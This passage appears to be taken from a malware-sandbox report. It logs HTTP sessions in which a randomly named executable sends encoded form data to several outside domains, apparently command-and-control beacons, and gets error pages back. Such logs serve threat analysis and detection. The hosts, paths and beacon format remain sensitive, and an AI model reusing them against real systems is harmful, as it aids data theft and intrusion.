LDVlCz=ARiXO+NFPFpMGv1jFz132MkPitF6S85glb2EIiCOd2g/9QEZpRL96F/2n8MEh6PQXbSkO6Zbl9v6maIWuingh488D/3X7LW0M/S/P2QIzcBePrM01Al22hvfIH+X86gDVWDLLWxW7DXgT5swvR1LO7RPXfvjtKTM8/Go162ohqg3mDPIGhfF8siaGfxmgyqxBrZhQCWg5ABVqrkas9tnxeNfzPFUOtK+7WPWrm42Oo+BAe46yDIHtPOUdRttZqb6jqthGS46/0lGo8+/YEtR+BiX7HkLgGd1kuH02zfxz0Zj7MF6u9qKkjsNyjxeuoA0Fngh/gPDfB12Q3L3Dcl9LNT9Fnp9i0BgvnqOFRoU+CIZo5d1pjbh/84IdHWVGGHceAZLQTSFsUT0dv+3LzHSKCLugJt4CYxsdlI4QE9l7xvPfDemdAs/kGQco7lfZZEV3wfyltEM/uNh+LlInxK1gs7sWcXcl1uqenKp1Z8xbLIcpb0vqIaH2isIUKMqyYqGLbFksO9B3zr51FO7n2Y1dhWYHFyFpp/DjwNJyIEGpK0nW0QgoDxrtZ3CzlyMVVEApReBcRElP8KidWthkw9uox6uolzSQ3y7ptmwfwHw3BaihIb/pR05XMiPlUyv3UhqAfo77dEYHXNUHRTZV62xrQg7WhWtAo1uebeN5GymP2qfrgQAjKT2xOwe3SQ14Mys688lZbu0VfR83j/JCqJTbsRv/wncmpAUE1Ol1of48nTD0OaSo/nExghLFoa8cq3/RtGYCSMN51fB6wR5482UbmuVDDtFcYzcLABKMItk3mT5wQ5RPbxFLYoWgF6G5eFZj4kb5qAjeinqshuvtS8kpkA7I8BmJV+nr2syv7tFtDqn0x9tTRYd8p2VcvP5wADJ7xeqESpdGPF4drrR5vQdlLQ1+tIg9EyDIRGBMkvYIH9C+/+kW9RGAOUmITkEbVRLO33ymuENwU2u9zLpPREjsyUVFvfj6oPs+mH/cVsh637cV [TRUNCATED]
                                                                                  Dec 12, 2024 00:20:59.519824982 CET262INHTTP/1.1 400 Bad Request
                                                                                  Date: Wed, 11 Dec 2024 23:20:59 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2
                                                                                  Connection: Upgrade, close
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  Content-Length: 33
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
                                                                                  Data Ascii: 310Q/Qp/KT\


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.55001238.6.78.235805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:21:00.888006926 CET501OUTGET /9lgl/?LDVlCz=NTK3NLhlAEJIOtoeBFtljOkEhfYZVbBGiOzAI1f+R144iBEE4BOnuC3DqsUysY3FH9LbQrV9xfPYm9YM/jyzxs8eKdKq7NnxOPLJXW8Qu/cpUMw46FhSxTz+BHey1p9/Wg==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.17jkgl.com
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:21:02.185863018 CET189INHTTP/1.1 503 Service Unavailable
                                                                                  Date: Wed, 11 Dec 2024 23:21:01 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2
                                                                                  Connection: Upgrade, close
                                                                                  Content-Length: 0
                                                                                  Content-Type: text/html; charset=utf-8


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.5500133.125.36.175805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:21:07.809226036 CET761OUTPOST /laeb/ HTTP/1.1
                                                                                  Host: www.thezensive.work
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.thezensive.work
                                                                                  Referer: http://www.thezensive.work/laeb/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 63 33 34 45 66 2b 44 47 6a 32 34 71 74 58 42 39 4a 74 2f 43 46 31 4f 47 68 56 53 2f 70 58 55 79 58 53 34 35 4f 36 54 6d 2b 6a 4c 71 44 4f 49 7a 7a 4e 72 71 36 6a 54 45 70 75 65 57 74 71 57 48 48 64 6a 72 35 49 6a 30 5a 6e 55 53 41 57 36 4d 41 78 31 71 53 70 68 56 6c 78 2b 34 54 56 30 6d 73 49 72 70 78 52 30 32 39 39 66 37 49 35 74 72 6e 6c 61 30 42 6b 31 4d 4c 65 69 42 32 56 43 4f 4d 38 5a 58 6f 61 4e 77 79 75 32 4c 6e 6c 79 58 2b 43 45 64 34 58 6b 6c 4c 46 62 56 71 5a 70 51 5a 66 6d 59 78 4e 58 72 73 4c 57 43 77 70 70 33 7a 42 78 4e 6a 6e 6f 51 74 6a 69 71 42 4a 67 48 73 35 46 4a 77 52 45 3d
                                                                                  Data Ascii: LDVlCz=c34Ef+DGj24qtXB9Jt/CF1OGhVS/pXUyXS45O6Tm+jLqDOIzzNrq6jTEpueWtqWHHdjr5Ij0ZnUSAW6MAx1qSphVlx+4TV0msIrpxR0299f7I5trnla0Bk1MLeiB2VCOM8ZXoaNwyu2LnlyX+CEd4XklLFbVqZpQZfmYxNXrsLWCwpp3zBxNjnoQtjiqBJgHs5FJwRE=
                                                                                  Dec 12, 2024 00:21:09.175654888 CET1236INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html
                                                                                  Date: Wed, 11 Dec 2024 23:21:08 GMT
                                                                                  Server: Netlify
                                                                                  X-Nf-Request-Id: 01JEW0DEFTND7EWSCMSEGFAJ6J
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Data Raw: 63 32 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 3a 32 20 31 32 38 20 31 32 35 3b 2d 2d 63 6f 6c 6f 72 54 65 61 6c 41 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 31 30 30 3a 32 34 36 20 32 34 36 20 32 34 37 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 3a 32 33 33 20 32 33 35 20 32 33 37 3b 2d 2d 63 6f 6c 6f 72 48 [TRUNCATED]
                                                                                  Data Ascii: c28<!doctype html><html lang=en><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><title>Site not found</title><style>:root{--colorRgbFacetsTeal600:2 128 125;--colorTealAction:var(--colorRgbFacetsTeal600);--colorRgbFacetsNeutralLight100:246 246 247;--colorRgbFacetsNeutralLight200:233 235 237;--colorHr:var(--colorRgbFacetsNeutralLight200);--colorRgbFacetsNeutralLight700:53 58 62;--colorGrayDarkest:var(--colorRgbFacetsNeutralLight700);--colorGrayLighter:var(--colorRgbFacetsNeutralLight200);--colorGrayLightest:var(--colorRgbFacetsNeutralLight100);--colorText:var(--colorGrayDarkest);--effectShadowLightShallow:0 1px 10px 0 rgb(53 58 62 / 6%), 0 2px 4px 0 rgb(53 58 62 / 8%);--colorRgbFacetsNeutralDark900:6 11 16;--colorStackText:rgb(var(--colorGrayDarkest));--colorCodeText:rgb(var(--colorGrayLightest));--colorRgbFacetsNeutralLight600:84 90 97;--colorGrayDarker:var(--colorRgbFacetsNeutralLight600);--colorTextMuted:var(--colorGrayDarker)}body{font-family:syst [TRUNCATED]
                                                                                  Dec 12, 2024 00:21:09.175688028 CET1236INData Raw: 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20
                                                                                  Data Ascii: cSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#fff;overflow:hidden;margin:0;padding:0;line-height:1.5;color:rgb(var(--colorText))}@media(prefers-color-scheme:dark){body{backg
                                                                                  Dec 12, 2024 00:21:09.175707102 CET907INData Raw: 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 29 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70
                                                                                  Data Ascii: k;background-color:var(--colorCodeText);color:var(--colorStackText);padding:4px 8px;border-radius:4px;font-size:.875rem;overflow-wrap:anywhere;font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,liberation mono,courier new,monospace;


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.5500143.125.36.175805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:21:10.474838972 CET781OUTPOST /laeb/ HTTP/1.1
                                                                                  Host: www.thezensive.work
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.thezensive.work
                                                                                  Referer: http://www.thezensive.work/laeb/
                                                                                  Content-Length: 227
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 63 33 34 45 66 2b 44 47 6a 32 34 71 72 30 5a 39 4c 4f 58 43 43 56 4f 46 74 31 53 2f 6d 33 55 32 58 53 30 35 4f 2f 72 32 2b 32 62 71 41 73 51 7a 39 73 72 71 33 44 54 45 69 4f 65 50 67 4b 58 46 48 63 66 4a 35 4e 4c 30 5a 6e 77 53 41 56 75 4d 63 57 42 74 54 35 68 74 37 52 2b 36 4d 46 30 6d 73 49 72 70 78 52 51 59 39 39 48 37 49 70 39 72 6d 45 61 33 64 30 31 4e 63 75 69 42 79 56 43 4b 4d 38 5a 31 6f 59 31 4f 79 73 2b 4c 6e 67 57 58 2b 32 51 65 78 58 6b 6e 46 6c 61 47 75 37 63 6e 5a 66 76 56 74 4d 53 56 38 39 61 6b 38 2f 59 64 70 6a 35 6c 77 48 45 6f 39 77 71 64 51 35 42 75 32 61 56 35 75 47 52 44 71 2b 4d 55 62 6c 48 34 78 4f 4b 62 35 58 37 66 66 65 68 4e
                                                                                  Data Ascii: LDVlCz=c34Ef+DGj24qr0Z9LOXCCVOFt1S/m3U2XS05O/r2+2bqAsQz9srq3DTEiOePgKXFHcfJ5NL0ZnwSAVuMcWBtT5ht7R+6MF0msIrpxRQY99H7Ip9rmEa3d01NcuiByVCKM8Z1oY1Oys+LngWX+2QexXknFlaGu7cnZfvVtMSV89ak8/Ydpj5lwHEo9wqdQ5Bu2aV5uGRDq+MUblH4xOKb5X7ffehN
                                                                                  Dec 12, 2024 00:21:11.851180077 CET1236INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html
                                                                                  Date: Wed, 11 Dec 2024 23:21:11 GMT
                                                                                  Server: Netlify
                                                                                  X-Nf-Request-Id: 01JEW0DH2ZEN27KMS03R7EWMTH
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Data Raw: 63 32 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 3a 32 20 31 32 38 20 31 32 35 3b 2d 2d 63 6f 6c 6f 72 54 65 61 6c 41 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 31 30 30 3a 32 34 36 20 32 34 36 20 32 34 37 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 3a 32 33 33 20 32 33 35 20 32 33 37 3b 2d 2d 63 6f 6c 6f 72 48 [TRUNCATED]
                                                                                  Data Ascii: c28<!doctype html><html lang=en><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><title>Site not found</title><style>:root{--colorRgbFacetsTeal600:2 128 125;--colorTealAction:var(--colorRgbFacetsTeal600);--colorRgbFacetsNeutralLight100:246 246 247;--colorRgbFacetsNeutralLight200:233 235 237;--colorHr:var(--colorRgbFacetsNeutralLight200);--colorRgbFacetsNeutralLight700:53 58 62;--colorGrayDarkest:var(--colorRgbFacetsNeutralLight700);--colorGrayLighter:var(--colorRgbFacetsNeutralLight200);--colorGrayLightest:var(--colorRgbFacetsNeutralLight100);--colorText:var(--colorGrayDarkest);--effectShadowLightShallow:0 1px 10px 0 rgb(53 58 62 / 6%), 0 2px 4px 0 rgb(53 58 62 / 8%);--colorRgbFacetsNeutralDark900:6 11 16;--colorStackText:rgb(var(--colorGrayDarkest));--colorCodeText:rgb(var(--colorGrayLightest));--colorRgbFacetsNeutralLight600:84 90 97;--colorGrayDarker:var(--colorRgbFacetsNeutralLight600);--colorTextMuted:var(--colorGrayDarker)}body{font-family:syst [TRUNCATED]
                                                                                  Dec 12, 2024 00:21:11.851201057 CET1236INData Raw: 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20
                                                                                  Data Ascii: cSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#fff;overflow:hidden;margin:0;padding:0;line-height:1.5;color:rgb(var(--colorText))}@media(prefers-color-scheme:dark){body{backg
                                                                                  Dec 12, 2024 00:21:11.851213932 CET907INData Raw: 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 29 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70
                                                                                  Data Ascii: k;background-color:var(--colorCodeText);color:var(--colorStackText);padding:4px 8px;border-radius:4px;font-size:.875rem;overflow-wrap:anywhere;font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,liberation mono,courier new,monospace;


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.2.5500153.125.36.175805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:21:13.138943911 CET1798OUTPOST /laeb/ HTTP/1.1
                                                                                  Host: www.thezensive.work
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.thezensive.work
                                                                                  Referer: http://www.thezensive.work/laeb/
                                                                                  Content-Length: 1243
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Data Raw: 4c 44 56 6c 43 7a 3d 63 33 34 45 66 2b 44 47 6a 32 34 71 72 30 5a 39 4c 4f 58 43 43 56 4f 46 74 31 53 2f 6d 33 55 32 58 53 30 35 4f 2f 72 32 2b 31 37 71 41 66 59 7a 39 50 7a 71 32 44 54 45 76 75 65 53 67 4b 58 45 48 63 48 4e 35 4e 47 4c 5a 6c 34 53 41 31 79 4d 4d 6a 74 74 61 35 68 74 68 78 2b 37 54 56 30 4a 73 49 62 74 78 52 67 59 39 39 48 37 49 72 31 72 68 56 61 33 4f 45 31 4d 4c 65 69 64 32 56 44 74 4d 38 51 4b 6f 65 6f 31 31 64 65 4c 6d 41 47 58 38 6c 34 65 73 6e 6b 68 47 6c 62 42 75 37 41 34 5a 66 69 6d 74 4d 32 76 38 36 65 6b 38 35 52 58 32 54 74 4b 75 68 41 79 7a 67 36 37 41 5a 64 33 70 35 39 42 69 58 64 57 76 39 4d 6d 5a 42 44 2f 77 2f 2f 41 6e 6d 76 77 61 36 45 6b 49 68 7a 66 62 52 32 65 35 34 30 36 46 71 51 6b 78 52 4f 47 49 52 45 6e 68 63 41 35 69 4c 6b 71 50 6f 43 66 35 59 30 6f 70 77 6f 4c 6e 75 7a 68 70 4f 4a 39 57 64 32 51 64 33 58 47 73 43 76 39 7a 62 7a 77 54 44 78 34 6c 6a 2b 7a 69 74 37 63 6a 4e 62 52 76 44 2b 33 36 4b 47 34 52 2b 67 64 2f 58 54 43 59 6b 4e 6c 74 32 76 69 32 78 51 [TRUNCATED]
                                                                                  Data Ascii: LDVlCz=c34Ef+DGj24qr0Z9LOXCCVOFt1S/m3U2XS05O/r2+17qAfYz9Pzq2DTEvueSgKXEHcHN5NGLZl4SA1yMMjtta5hthx+7TV0JsIbtxRgY99H7Ir1rhVa3OE1MLeid2VDtM8QKoeo11deLmAGX8l4esnkhGlbBu7A4ZfimtM2v86ek85RX2TtKuhAyzg67AZd3p59BiXdWv9MmZBD/w//Anmvwa6EkIhzfbR2e5406FqQkxROGIREnhcA5iLkqPoCf5Y0opwoLnuzhpOJ9Wd2Qd3XGsCv9zbzwTDx4lj+zit7cjNbRvD+36KG4R+gd/XTCYkNlt2vi2xQauz3H0PUaeRvNXXhHZxDOxNrPqHSxNq/+QNKWLct4YQ5K+rdLwlXB9+spDZyi2o5stpiU6Wj6vJYqGUdcId4vC+jRGWxzhWcl8BGobGzjnNnEAbrFFC1/TKyEIWIhSDCDOYDV2KWtRZegh4YaxK9Z1tkkR6/uW+fENaDdG5hpeZ5N5XoYqgRHgLO7aB9u2MNMX5TnDi59nY1tnGVE7++sVdRgG/caUBur1G1KfhNLInXq0qzNoP++1MWCeBVHVaeaFQbkrK/KETY1fvojWHV9kkCU+MeIoqvSiVu8hW/dZm2rfgEF1JiJKsPMnxALLNIA1f5xhr1VRubWi73/5yRvlgeenf0KyGNal6aiy1QxQ2h7PDjI1Z/Yh+qWfMGDDJK8dxlh4J5Gn7SHYwz00VM/zvXpwOxThM6ARjm9PZ5Iv6dyTmwrRFB0Snh2v7bRHuJt0VC/rRcL+LdTVGUe23olVbW0XEyii6vAQGB/QsJ3ATuDEioN+/NvPtE3dlmf4xCjWcmGgMQf51+wdVA1mDk3SchF3suvCD+7GCLBFr9/Gw2/YTe3oynrXjW/ae64Kg7quZCCGNHxrlATqJRGa0qkXVOpSxVZFFkwJASdiAj/gYdaw0SoaKjMGKSmdLj0Ll8T9ud9itXE2RaCrgObC2tsWhkNym1J8O4dB [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.2.5500163.125.36.175805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:21:15.791404009 CET506OUTGET /laeb/?LDVlCz=R1QkcJ3G5DA9kU07Q4bHZGXwpE7poG4obEoFTYXYr0KTY8cjuufgj2Wfg7CEtb/if9/3otTPHXcvO0KabB4WT9d0qR/eTQNYs+qdxysYlPDjIZ08l2KjBlYrb7eSynDgaw==&NdLhG=cLCtFnqPUvutTbuP HTTP/1.1
                                                                                  Host: www.thezensive.work
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
                                                                                  Dec 12, 2024 00:21:17.158143044 CET1236INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html
                                                                                  Date: Wed, 11 Dec 2024 23:21:16 GMT
                                                                                  Server: Netlify
                                                                                  X-Nf-Request-Id: 01JEW0DP9F8NNKJJTX4FMN3PDE
                                                                                  Connection: close
                                                                                  Transfer-Encoding: chunked
                                                                                  Data Raw: 63 32 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 3a 32 20 31 32 38 20 31 32 35 3b 2d 2d 63 6f 6c 6f 72 54 65 61 6c 41 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 54 65 61 6c 36 30 30 29 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 31 30 30 3a 32 34 36 20 32 34 36 20 32 34 37 3b 2d 2d 63 6f 6c 6f 72 52 67 62 46 61 63 65 74 73 4e 65 75 74 72 61 6c 4c 69 67 68 74 32 30 30 3a 32 33 33 20 32 33 35 20 32 33 37 3b 2d 2d 63 6f 6c 6f 72 48 [TRUNCATED]
                                                                                  Data Ascii: c28<!doctype html><html lang=en><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1"><title>Site not found</title><style>:root{--colorRgbFacetsTeal600:2 128 125;--colorTealAction:var(--colorRgbFacetsTeal600);--colorRgbFacetsNeutralLight100:246 246 247;--colorRgbFacetsNeutralLight200:233 235 237;--colorHr:var(--colorRgbFacetsNeutralLight200);--colorRgbFacetsNeutralLight700:53 58 62;--colorGrayDarkest:var(--colorRgbFacetsNeutralLight700);--colorGrayLighter:var(--colorRgbFacetsNeutralLight200);--colorGrayLightest:var(--colorRgbFacetsNeutralLight100);--colorText:var(--colorGrayDarkest);--effectShadowLightShallow:0 1px 10px 0 rgb(53 58 62 / 6%), 0 2px 4px 0 rgb(53 58 62 / 8%);--colorRgbFacetsNeutralDark900:6 11 16;--colorStackText:rgb(var(--colorGrayDarkest));--colorCodeText:rgb(var(--colorGrayLightest));--colorRgbFacetsNeutralLight600:84 90 97;--colorGrayDarker:var(--colorRgbFacetsNeutralLight600);--colorTextMuted:var(--colorGrayDarker)}body{font-family:syst [TRUNCATED]
                                                                                  Dec 12, 2024 00:21:17.158221006 CET1236INData Raw: 63 53 79 73 74 65 6d 46 6f 6e 74 2c 73 65 67 6f 65 20 75 69 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 2c 61 70 70 6c 65 20 63 6f 6c 6f 72 20 65 6d 6f 6a 69 2c 73 65 67 6f 65 20 75 69 20
                                                                                  Data Ascii: cSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#fff;overflow:hidden;margin:0;padding:0;line-height:1.5;color:rgb(var(--colorText))}@media(prefers-color-scheme:dark){body{backg
                                                                                  Dec 12, 2024 00:21:17.158231020 CET907INData Raw: 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 43 6f 64 65 54 65 78 74 29 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 53 74 61 63 6b 54 65 78 74 29 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70
                                                                                  Data Ascii: k;background-color:var(--colorCodeText);color:var(--colorStackText);padding:4px 8px;border-radius:4px;font-size:.875rem;overflow-wrap:anywhere;font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,liberation mono,courier new,monospace;


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.2.550017172.67.176.240805884C:\Program Files (x86)\deHCFxEMnnsbRAehKEUTseKmWUMFTDDxOkYBHisCnKIRLAVVRVZggXKOY\pNkvbgLNQpIoyz.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 12, 2024 00:21:22.641112089 CET770OUTPOST /26nq/ HTTP/1.1
                                                                                  Host: www.zrichiod-riech.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.zrichiod-riech.sbs
                                                                                  Referer: http://www.zrichiod-riech.sbs/26nq/
                                                                                  Content-Length: 207
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.1369.1414 Safari/537.36
